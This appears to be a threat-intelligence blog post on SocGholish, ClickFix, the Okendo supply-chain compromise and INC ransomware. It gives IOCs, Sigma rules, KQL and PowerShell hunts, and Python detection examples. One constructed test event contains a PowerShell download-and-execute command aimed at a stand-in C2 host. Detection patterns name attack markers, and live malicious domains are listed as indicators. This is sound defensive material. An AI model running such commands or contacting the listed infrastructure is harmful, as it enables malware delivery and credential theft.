Threat Summary
Recent OTX Pulse data indicates a volatile shift in the threat landscape following law enforcement actions against TA569 (GOLD PRELUDE). While Operation Endgame successfully dismantled the SocGholish infrastructure (106 servers), threat actors are rapidly pivoting to AI-generated ClickFix campaigns and supply chain compromises to maintain their credential theft footprint.
The primary attack vectors observed include:
- SocGholish Fallout: While disrupted, remnants of the fake browser update infrastructure remain active, distributing loaders for IcedID and Pikabot.
- AI-Generated Typosquatting: Attackers are using AI to create high-fidelity typosquatting domains (e.g., Brazilian banks) to deploy SmartRAT via fake CAPTCHA/ClickFix techniques.
- Supply Chain (Okendo): A sophisticated JavaScript injection attack targeting the Okendo Reviews widget is impacting over 18,000 e-commerce brands, delivering NetSupport and StealC.
- RaaS Evolution: The INC Ransomware group (Rust-based) is aggressively exploiting CVE-2023-3519 and CVE-2024-57727 to capitalize on the void left by LockBit.
Collectively, these campaigns aim for initial access leading to credential harvesting, data exfiltration, and double-extortion ransomware.
Threat Actor / Malware Profile
GOLD PRELUDE (TA569) & SocGholish
- Status: Disrupted but active remnants persist.
- Distribution: Compromised WordPress sites serving fake browser update JScript payloads.
- Payloads: Drops IcedID, Pikabot, Bumblebee.
- Behavior: Establishes C2 for secondary payload delivery (Ransomware/Droppers).
SmartApeSG & SmartRAT
- Vector: AI-generated typosquatting domains (e.g., crefisa.online).
- Technique: "ClickFix": fake browser crash or CAPTCHA pages that copy a malicious PowerShell command to the clipboard and instruct the victim to paste and run it (typically via the Win+R Run dialog, so the browser itself is not the parent of the resulting process).
- Payload: SmartRAT (PowerShell-based banking trojan) and Remcos.
- Capabilities: Encrypted C2, QR code interception, credential theft.
INC Ransomware
- Type: Rust-based Ransomware-as-a-Service (RaaS).
- Evolution: Rewritten in Rust for cross-platform (Windows/Linux/ESXi) encryption.
- Access: Utilizes Cobalt Strike and exploits vulnerabilities in VPN appliances (CVE-2023-3519).
Infostealers (LummaC2, ACRStealer, StealC)
- Distribution: Malicious supply chain JS (Okendo), cracked software on Mediafire/AWS S3.
- Behavior: DLL side-loading, cookie/session theft, cryptocurrency wallet extraction.
IOC Analysis
The provided IOCs span multiple infrastructure types requiring immediate blocklisting:
- Hostnames/Domains (C2/Infrastructure): Indicators like trademark.iglesiaelarca.com (SocGholish) and crefisa.online (SmartRAT) represent C2 infrastructure and delivery hosts. SOC teams should add these to DNS sinkholes and firewall blocklists.
- URLs (Supply Chain): The api.wigetticks.com and api.wizzleticks.com endpoints are the C2 receivers for the Okendo compromise. Blocking these at the proxy breaks the data exfiltration chain.
- CVEs (Initial Access): CVE-2023-3519, CVE-2024-57727, and CVE-2025-5777 are associated with INC Ransomware initial access. Vulnerability management must prioritize these patches immediately.
- File Hashes: Several MD5 and SHA256 hashes correspond to the SmartRAT droppers and INC ransomware payloads. EDR solutions should be tuned to alert on execution of these specific hashes. Hash matches are point-in-time indicators that a recompiled dropper evades, so pair them with the behavioral rules in the Detection Engineering section rather than relying on them alone.
Detection Engineering
Sigma Rules
title: Potential SocGholish Fake Browser Update Activity
id: 9a6c4e1c-1b2d-4c3d-8e5f-6a7b8c9d0e1f
description: Detects execution patterns associated with SocGholish fake browser updates, typically involving wscript.exe or mshta.exe launching suspicious JScript payloads.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/624567890abcdef
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
        Image|endswith:
            - '\wscript.exe'
            - '\mshta.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'update'
            - 'install'
            - 'chrome'
            - '.js'
    condition: selection
falsepositives:
    - Legitimate software updates initiated by browser
level: high
tags:
    - attack.initial_access
    - attack.t1189
---
title: AI-Generated ClickFix PowerShell Execution
id: b7d5e2f3-4c6a-8d9e-0f1a-2b3c4d5e6f7a
description: Detects PowerShell commands characteristic of ClickFix campaigns (base64 decoding, clipboard access, Invoke-Expression) spawned by a browser or by explorer.exe. The explorer.exe parent matters because the victim pastes the clipboard-staged command into the Win+R Run dialog, so the browser is usually not the parent of the resulting PowerShell process.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/624567890abcdef
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|endswith:
            - '\chrome.exe'
            - '\firefox.exe'
            - '\msedge.exe'
            - '\explorer.exe'   # Run dialog (Win+R) launches
    selection_image:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
    selection_cli:
        CommandLine|contains:
            - 'FromBase64String'
            - 'clipboard'
            - 'iex'
            - 'invoke-expression'
    condition: all of selection_*
falsepositives:
    - Legitimate web-based management tools
    - Administrators launching PowerShell one-liners from the Run dialog
level: critical
tags:
    - attack.execution
    - attack.t1059.001
---
title: Okendo Supply Chain Malicious JS Connection
id: c1e2d3f4-a5b6-c7d8-e9f0-1a2b3c4d5e6f
description: Detects outbound network connections to known malicious domains associated with the Okendo Reviews widget supply chain attack.
status: experimental
date: 2026/06/19
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/624567890abcdef
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationHostname|contains:
            - 'wigetticks.com'
            - 'wizzleticks.com'
    condition: selection
falsepositives:
    - Unknown
level: critical
tags:
    - attack.command_and_control
    - attack.t1071.001
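The two process_creation rules above are easiest to reason about when their matching semantics are spelled out and run against concrete events. The following is an added example, not code from the original page or from Security Arsenal: it re-implements the SocGholish and ClickFix rule logic in plain Python (case-insensitive Sigma string modifiers, OR within a field's list, AND across fields, and the `all of selection_*` condition) and evaluates it over constructed sample events. One assumption is layered on top of the rule as written: `explorer.exe` is accepted as a ClickFix parent, because the pasted command is launched from the Win+R Run dialog rather than by the browser. The sample paths and command lines are illustrative, not observed samples.

```python
"""Evaluate the page's two process_creation Sigma rules in plain Python.

Added example, not code from the original page or from Security Arsenal.
Sample events are constructed, not real telemetry. explorer.exe as a ClickFix
parent is an assumption added on top of the rule as written (Run dialog launch).
"""
from dataclasses import dataclass

BROWSERS = ("\\chrome.exe", "\\firefox.exe", "\\msedge.exe")
CLICKFIX_PARENTS = BROWSERS + ("\\explorer.exe",)  # extension, see docstring


@dataclass
class ProcessEvent:
    """Minimal process_creation event carrying the three fields the rules use."""
    parent_image: str
    image: str
    command_line: str


def _endswith_any(value, suffixes):
    """Sigma 'endswith' modifier: case-insensitive, list entries are OR'ed."""
    v = value.lower()
    return any(v.endswith(s.lower()) for s in suffixes)


def _contains_any(value, needles):
    """Sigma 'contains' modifier: case-insensitive substring, list entries are OR'ed."""
    v = value.lower()
    return any(n.lower() in v for n in needles)


def socgholish_rule(ev):
    """'Potential SocGholish Fake Browser Update Activity': a single selection map,
    so all three field checks must hold for the same event."""
    return (
        _endswith_any(ev.parent_image, BROWSERS)
        and _endswith_any(ev.image, ("\\wscript.exe", "\\mshta.exe", "\\cmd.exe"))
        and _contains_any(ev.command_line, ("update", "install", "chrome", ".js"))
    )


def clickfix_rule(ev):
    """'AI-Generated ClickFix PowerShell Execution': condition 'all of selection_*'."""
    selection_parent = _endswith_any(ev.parent_image, CLICKFIX_PARENTS)
    selection_image = _endswith_any(ev.image, ("\\powershell.exe", "\\pwsh.exe"))
    selection_cli = _contains_any(
        ev.command_line, ("FromBase64String", "clipboard", "iex", "invoke-expression")
    )
    return selection_parent and selection_image and selection_cli


def evaluate(events):
    """Return, per event, the list of rule titles that fired (empty list = no alert)."""
    results = []
    for ev in events:
        fired = []
        if socgholish_rule(ev):
            fired.append("SocGholish")
        if clickfix_rule(ev):
            fired.append("ClickFix")
        results.append(fired)
    return results


# Constructed sample events (paths and commands are illustrative, not observed samples)
SAMPLE_EVENTS = [
    # 1. Fake browser update: Edge launches wscript.exe on a downloaded "update" script
    ProcessEvent(r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                 r"C:\Windows\System32\wscript.exe",
                 r'wscript.exe "C:\Users\u\Downloads\Chrome_Update.js"'),
    # 2. ClickFix: command pasted into Win+R, so explorer.exe is the parent, not the browser
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
                 ".DownloadString('http://c2.example.invalid/a')\""),
    # 3. Benign: browser spawning its own renderer process
    ProcessEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 "chrome.exe --type=renderer --lang=en-US"),
    # 4. Benign: admin runs a script from the Run dialog without any ClickFix marker
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    # 5. Noise case: a legitimate installer launched from the browser via cmd.exe still
    #    matches the SocGholish rule because 'install' is in its keyword list
    ProcessEvent(r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                 r"C:\Windows\System32\cmd.exe",
                 r'cmd.exe /c "C:\Users\u\Downloads\VendorInstaller.exe" /silent'),
]

if __name__ == "__main__":
    for ev, fired in zip(SAMPLE_EVENTS, evaluate(SAMPLE_EVENTS)):
        print(f"{fired or ['-']}\t{ev.image.split(chr(92))[-1]}\t{ev.command_line[:60]}")
```

Event 5 is the one to study before deploying the SocGholish rule: any browser-launched `cmd.exe` whose command line mentions "install", "update" or "chrome" trips it, which is why the rule carries a falsepositives entry and is better used for hunting or as a correlation input than as an auto-isolate trigger.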
KQL (Microsoft Sentinel)
// Hunt for SocGholish and ClickFix related network connections and process creations
let SuspiciousDomains = dynamic(['trademark.iglesiaelarca.com', 'content.garretttrails.org', 'crefisa.online', 'windowsupdate-cdn.com']);
let SuspiciousIPs = dynamic(['162.141.111.227']);
// DeviceNetworkEvents for C2 connections (has_any also matches subdomains and full URLs, unlike an exact 'in')
DeviceNetworkEvents
| where RemoteUrl has_any (SuspiciousDomains) or RemoteIP in (SuspiciousIPs)
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP, RemotePort
| extend IOCType = 'NetworkConnection'
| union (
    // DeviceProcessEvents for Fake Update and PowerShell patterns
    DeviceProcessEvents
    | where (InitiatingProcessFileName in~ ('chrome.exe', 'firefox.exe', 'msedge.exe')
             and (FileName in~ ('wscript.exe', 'mshta.exe', 'powershell.exe')
                  or ProcessCommandLine has_any ('update', 'chrome', 'FromBase64String', 'clipboard')))
        // ClickFix: the pasted command is launched from the Win+R Run dialog, so explorer.exe is the parent
        or (InitiatingProcessFileName =~ 'explorer.exe'
            and FileName in~ ('powershell.exe', 'pwsh.exe')
            and ProcessCommandLine has_any ('FromBase64String', 'clipboard', 'iex', 'invoke-expression'))
    | project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName
    | extend IOCType = 'ProcessCreation'
)
| order by Timestamp desc
PowerShell Hunt Script
# Hunt for SmartRAT, Remcos, and SocGholish artifacts
# Check for suspicious processes associated with the Pulse data
$suspiciousProcesses = @('powershell.exe', 'wscript.exe', 'mshta.exe', 'regsvr32.exe')
$suspiciousParents   = @('chrome.exe', 'firefox.exe', 'msedge.exe')
$clickFixMarkers     = 'FromBase64String|clipboard|iex|invoke-expression'

Write-Host "Checking for processes spawned by browsers matching suspicious criteria..."
# Win32_Process exposes ParentProcessId and CommandLine on both Windows PowerShell 5.1 and
# PowerShell 7; Get-Process only has a .Parent property on PowerShell 7+.
$allProcs = Get-CimInstance Win32_Process
$byPid = @{}
foreach ($p in $allProcs) { $byPid[[int]$p.ProcessId] = $p }
# Second clause: ClickFix commands are pasted into the Win+R Run dialog, so explorer.exe
# (not the browser) is the parent of the resulting PowerShell process.
$allProcs | Where-Object {
    $parent = $byPid[[int]$_.ParentProcessId]
    if (-not $parent) { return $false }
    $parentName = $parent.Name.ToLower()
    $childName  = $_.Name.ToLower()
    ($suspiciousParents -contains $parentName -and $suspiciousProcesses -contains $childName) -or
    ($parentName -eq 'explorer.exe' -and $childName -in 'powershell.exe','pwsh.exe' -and
     $_.CommandLine -match $clickFixMarkers)
} | Select-Object ProcessId, Name, @{n='Parent'; e={ $byPid[[int]$_.ParentProcessId].Name }}, CommandLine |
    Format-Table -AutoSize -Wrap

# Check for connections to IOCs (requires admin to see OwningProcess for other users' sockets)
# Resolve the IOC hostnames forward and compare the resulting IPs against established
# connections; reverse DNS on a remote IP almost never returns the attacker's hostname.
$targetDomains = @('trademark.iglesiaelarca.com', 'crefisa.online', 'api.wigetticks.com', 'api.wizzleticks.com')
Write-Host "Checking active network connections for malicious domains..."
$iocIps = @{}
foreach ($d in $targetDomains) {
    try {
        Resolve-DnsName -Name $d -Type A -ErrorAction Stop | Where-Object { $_.IPAddress } |
            ForEach-Object { $iocIps[$_.IPAddress] = $d }
    } catch { }
}
$activeConnections = Get-NetTCPConnection -State Established |
    Where-Object { $iocIps.ContainsKey($_.RemoteAddress) } |
    Select-Object RemoteAddress, RemotePort, OwningProcess, @{n='Domain'; e={ $iocIps[$_.RemoteAddress] }}
if ($activeConnections) {
    Write-Host "WARNING: Found active connections to known malicious domains:" -ForegroundColor Red
    $activeConnections | Format-Table -AutoSize
} else {
    Write-Host "No active connections to known malicious domains found."
}
# A lookup whose connection already closed still leaves a trace in the resolver cache
$cacheHits = Get-DnsClientCache -ErrorAction SilentlyContinue | Where-Object {
    $entry = $_.Entry.ToLower()
    $targetDomains | Where-Object { $entry -eq $_ -or $entry.EndsWith(".$_") }
}
if ($cacheHits) { $cacheHits | Select-Object Entry, Data | Format-Table -AutoSize }

# Check for SmartRAT/Remcos persistence in Registry
$regPaths = @('HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
              'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run')
Write-Host "Checking Registry for suspicious persistence keys..."
foreach ($path in $regPaths) {
    if (Test-Path $path) {
        $key = Get-ItemProperty -Path $path
        foreach ($name in ($key.PSObject.Properties | Where-Object { $_.Name -notlike 'PS*' }).Name) {
            $propVal = [string]$key.$name
            # Escape the dot: a bare '.js' is a regex that matches any character followed by 'js'
            if ($propVal -match 'powershell|pwsh|javascript|wscript|mshta|\.js\b|\.hta\b') {
                Write-Host "Suspicious Key in $path : $name = $propVal" -ForegroundColor Yellow
            }
        }
    }
}
Response Priorities
- Immediate:
- Block all hostnames and domains listed in the IOC Analysis section at the firewall and proxy level.
- Kill any processes matching the Sigma rule patterns (browser spawning wscript/powershell) and isolate the host.
- 24 Hours:
- Conduct credential resets for accounts active on devices showing signs of infostealer infection (Okendo/SmartRAT).
- Review web proxy logs for connections to okendo.io widget endpoints followed by connections to wigetticks.com or wizzleticks.com from the same client.
- 1 Week:
- Patch systems against CVE-2023-3519 and CVE-2024-57727 to mitigate INC Ransomware initial access vectors.
- Implement strict allow-listing for browser-spawned processes to prevent ClickFix and Fake Update execution chains.
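The 24-hour step of reviewing proxy logs for an okendo.io widget load followed by a wigetticks.com or wizzleticks.com connection is a sequence check, not a single IOC match. The following is an added example, not code from the original page or from Security Arsenal: it parses proxy log lines, groups them per client, and reports each malicious-host connection that was preceded within a time window by a widget fetch from the same client, alongside a plain list of every client that touched the C2 hosts at all. The log format (ISO timestamp, client IP, method, URL, status), every log line, the 5-minute window, and the widget URL with its query string are constructed for this example and are not documented Okendo paths or observed data.

```python
"""Correlate proxy logs for the Okendo widget compromise sequence.

Added example, not code from the original page or from Security Arsenal.
Log format, sample lines, the window length and the widget URL are constructed
assumptions for this example.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

MALICIOUS_HOSTS = frozenset(["api.wigetticks.com", "api.wizzleticks.com"])
WIDGET_DOMAIN = "okendo.io"
WINDOW = timedelta(minutes=5)  # assumed dwell time between widget load and first beacon

# Constructed proxy format: "<iso-timestamp> <client-ip> <method> <url> <status>"
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")


def parse_line(line):
    """Parse one proxy log line; return None for lines that do not fit the format."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, url, status = m.groups()
    try:
        when = datetime.fromisoformat(ts)
    except ValueError:
        return None
    host = (urlparse(url).hostname or "").lower()
    return {"ts": when, "client": client, "method": method, "host": host,
            "url": url, "status": int(status)}


def is_widget_fetch(rec):
    """okendo.io itself or any subdomain of it."""
    return rec["host"] == WIDGET_DOMAIN or rec["host"].endswith("." + WIDGET_DOMAIN)


def is_malicious(rec):
    return rec["host"] in MALICIOUS_HOSTS


def _records_by_client(lines):
    """Group parsed records per client IP, sorted by time; unparsable lines are dropped."""
    per_client = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is not None:
            per_client[rec["client"]].append(rec)
    for recs in per_client.values():
        recs.sort(key=lambda r: r["ts"])
    return per_client


def ioc_matches(lines):
    """Sorted client IPs that contacted a malicious host at all (plain IOC hit)."""
    per_client = _records_by_client(lines)
    return sorted(c for c, recs in per_client.items() if any(is_malicious(r) for r in recs))


def correlate(lines, window=WINDOW):
    """Widget fetch followed within `window` by a malicious-host connection, same client.

    Returns one dict per qualifying beacon, tied to the most recent preceding widget fetch."""
    findings = []
    for client, recs in _records_by_client(lines).items():
        widget_fetches = [r for r in recs if is_widget_fetch(r)]
        for beacon in (r for r in recs if is_malicious(r)):
            prior = [w for w in widget_fetches
                     if beacon["ts"] - window <= w["ts"] <= beacon["ts"]]
            if prior:
                w = prior[-1]
                findings.append({
                    "client": client,
                    "widget_url": w["url"],
                    "c2_host": beacon["host"],
                    "delta_s": int((beacon["ts"] - w["ts"]).total_seconds()),
                })
    return findings


# Constructed sample log: one client shows the full widget -> beacon sequence, one beacons
# long after the widget load, one beacons with no widget load at all
SAMPLE_LOG = """\
2026-06-19T10:00:01 10.1.2.3 GET https://shop.example.com/products/1 200
2026-06-19T10:00:02 10.1.2.3 GET https://cdn.okendo.io/widget.js?store=shop 200
2026-06-19T10:00:04 10.1.2.3 POST https://api.wigetticks.com/collect 200
2026-06-19T10:07:00 10.1.2.9 GET https://cdn.okendo.io/widget.js?store=shop 200
2026-06-19T10:30:00 10.1.2.9 POST https://api.wizzleticks.com/collect 200
2026-06-19T10:31:00 10.1.2.5 POST https://api.wizzleticks.com/collect 200
this line is not in the expected format and is skipped
"""

if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("IOC hits:", ioc_matches(lines))
    for f in correlate(lines):
        print(f"{f['client']}: {f['widget_url']} -> {f['c2_host']} after {f['delta_s']}s")
```

The two outputs answer different questions: `ioc_matches` is the blocklist view (every client that must be triaged), while `correlate` identifies the clients whose beacon is attributable to the compromised widget, which is what drives the credential-reset decision for users of those devices. Widen the window when the proxy logs are coarse or the widget is cached by the browser, since a cached widget produces no new okendo.io request before the beacon.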